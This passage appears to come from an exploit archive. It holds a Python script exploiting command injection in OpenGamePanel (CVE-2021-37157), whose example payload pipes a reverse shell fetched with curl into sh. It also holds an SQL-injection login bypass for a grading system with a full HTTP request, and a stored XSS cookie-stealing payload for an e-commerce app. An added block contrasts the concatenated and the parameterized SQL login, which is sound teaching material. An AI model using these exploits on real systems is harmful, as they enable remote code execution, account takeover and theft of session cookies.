# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102

# Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command= between ';', the user needs to be authenticated for this.

import requests

banner = """ @ @ @@& @@@@@/ @ @& #@@@@@& .= ,/%@# @ @@@@@@@@@@@@@((%@@@@* @ #@@@@@@@@@@@@@@@*%@, @ @@@@@@@@@@@@@@&@@@@ @ &@@@@@@@@@/ &@@@. @ @@@@@@@@@( @ @@@@@@@@@@@@@&* @ &@@@@@@@@@@@@@@@@% @ ,&@@@@@@@@@@@@@ @ %@@@@@@@. @ .%@@@@@@@@% @@@@@@ @ @@@@@# .&@@@@# @ (@@@@@@@@@@@. .@@@& @@% @ .@@@@@, #@@@@@* #@@@ @@@@@ @ @@@& &@@@. @@@ @ ,@@@ @@@@@@ @ @@@ %@@@, @&@@ @@@, @@@@ @@@@ *@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@= % *@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@= % *@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@= % *@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@= % *@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@= @@@@

##You can get mod_id and home_id on your game panel URL when you are logged
"""
print(banner)

target = input("Target url: (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")

url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}

try:
    requests.post(url, headers=headers, cookies=cookies, data=data)
except:
    print("Something went wrong, check your inputs or try manually exploiting the map parameter")

print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")
  24. # Exploit Title: Student Quarterly Grading System 1.0 - SQLi Authentication Bypass
# Date: 04.10.2021
# Exploit Author: Blackhan
# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux

# Student Quarterly Grading System v1.0 Login page can be bypassed with a simple SQLi to the username parameter.

Steps To Reproduce:
1 - Go to the login page http://localhost/grading_system/login.php
2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes and type anything to password field.
3 - Click on "Login" button and you are logged in as administrator.

PoC

POST /grading_system/Actions.php?a=login HTTP/1.1
Host: localhost
Content-Length: 45
sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/grading_system/login.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j
Connection: close

username=bypass'+or+1%3D1--+-&password=bypass
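Posts 18, 20, 21 and 24 above are the same defect four times: a login query built by string concatenation, so a quote in the username rewrites the WHERE clause and the password check is never reached. The block below is an added example, not code from any of those projects or posts, that reproduces the vulnerable pattern and its parameterized replacement against a constructed in-memory SQLite table and runs each post's username through both, so the difference is visible on real query results. The function names, the table layout and the sample credential are constructed for this example.

```python
import hashlib
import sqlite3


def _hash(password):
    """Stand-in for whatever digest the application stores (the posts' apps use MD5 or plain text)."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """Constructed in-memory stand-in for the admin table of the PHP apps above: one admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (?, ?)", ("admin", _hash("S3cret!")))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The pattern those login forms use: the username is pasted straight into the SQL text,
    so  admin' or '1'='1  turns the clause into  username='admin' OR (...)  and  ' OR 1 -- -
    comments the password comparison out entirely."""
    sql = ("SELECT username FROM admin WHERE username='" + username +
           "' AND password='" + _hash(password) + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Same query with bound parameters: quotes and comment markers stay inside the value."""
    row = conn.execute(
        "SELECT username FROM admin WHERE username=? AND password=?",
        (username, _hash(password)),
    ).fetchone()
    return row[0] if row else None


# The usernames and passwords the four posts submit, plus an honest attempt with a wrong password.
PAYLOADS = {
    "dms/dfsms": ("admin' or '1'='1", "dfsms"),
    "lodge": ("' OR 1 -- -", "' OR 1 -- -"),
    "grading_system": ("bypass' or 1=1-- -", "bypass"),
    "honest-wrong-password": ("admin", "not-the-password"),
}


def compare(conn):
    """Map each payload name to (result of vulnerable login, result of parameterized login)."""
    return {name: (login_vulnerable(conn, user, pw), login_parameterized(conn, user, pw))
            for name, (user, pw) in PAYLOADS.items()}


if __name__ == "__main__":
    db = make_db()
    for name, (weak, safe) in compare(db).items():
        print("%-22s concatenated -> %-6s parameterized -> %s" % (name, weak, safe))
```

Every injected username logs in as admin through the concatenated query and fails through the bound one; only the real password succeeds in the parameterized version. In the PHP originals the equivalent fix is a prepared statement (mysqli or PDO with bound parameters), not escaping the quote.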
  25. # Exploit Title: Young Entrepreneur E-Negosyo System 1.0 - 'PRODESC' Stored Cross-Site Scripting (XSS)
# Date: 2021-10-03
# Exploit Author: Jordan Glover
# Vendor Homepage: https://www.sourcecodester.com/php/12684/young-entrepreneur-e-negosyo-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12684&title=Young+Entrepreneur+E-Negosyo+System+in+PHP+Free+Source+Code
# Version: v1.0
# Tested on: Windows 10 + XAMPP v3.3.0

Young Entrepreneur E-Negosyo System 1.0 suffers from a Cross Site Scripting (XSS) vulnerability.

Step 1 - Create a new product to sell - http://localhost/bsenordering/admin/products/index.php?view=add
Step 2 - Fill out all required fields to create a new product. Input a payload in the product description field - <script>alert(document.cookie)</script>
Step 3 - Save the product. The stored XSS triggers for all users that navigate to the home page.

POC

POST /bsenordering/admin/products/controller.php?action=add HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------375756297829058981022228786743
Content-Length: 1203
Origin: http://localhost
Connection: close
Referer: http://localhost/bsenordering/admin/products/index.php?view=add
Cookie: PHPSESSID=794albocs4b1st3m9hsileorpg
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERNAME"

Test
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="OWNERPHONE"

0000000000
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PRODESC"

<script>alert(document.cookie)</script>
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="CATEGORY"

3
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="ORIGINALPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROPRICE"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="PROQTY"

100
-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------375756297829058981022228786743
Content-Disposition: form-data; name="save"


-----------------------------375756297829058981022228786743--